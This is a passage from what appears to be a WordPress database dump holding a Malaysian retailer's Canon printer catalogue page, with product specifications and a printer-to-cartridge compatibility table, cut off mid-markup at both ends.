width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-24 15:29:44','2019-09-24 07:29:44','',1449,'https://bintara.com.my/blog/2019/09/24/1449-revision-v1/',0,'revision','',0),(3290,1,'2019-09-24 15:31:24','2019-09-24 07:31:24','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><p>Â </p><p>Â </p><center>[maxbutton id=\"11\" ]</center><p>Â </p>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing\nThis compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.\nPrint, Scan, Copy, Fax\nISO standard print speed (A4): 8.8ipm black / 4.4ipm colour\nHi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct\nRecommended print volume: 50 - 200 pages\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><p>&lt;center&gt;[maxbutton id=\"11\" ]&lt;/center&gt;</p>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Laser Printers :-</h3>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<h4>Compact with wireless connectivity</h4><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Printing</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 43ppm</li><li>Recommended monthly print volume: 2,000 - 7,500 pages</li><li>FPOT: 6.2secs. (A4)</li><li>Max. paper input capacity: Up to 2,300 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 38ppm</li><li>Recommended monthly print volume: 750 - 4,000 pages</li><li>FPOT: 5.5secs. (A4)</li><li>Max. paper input capacity: Up to 900 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Cartridge Printers :-</h3>		\n		<table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>imagePROGRAF PRO-500</p></td><td width=\"208\"><p>Maintenance Cartridge MC-20</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY iB4170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5070</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5370</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5470</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA E3170</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E410</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA E4270</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E470</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E477</p></td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E480</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E510</p></td><td width=\"208\"><p>CL-98 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-88 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560 / E560R</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G2010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G4010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP100</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110 (with battery)</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP1300</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2770 / iP2772</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2870S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr></tbody></table><table 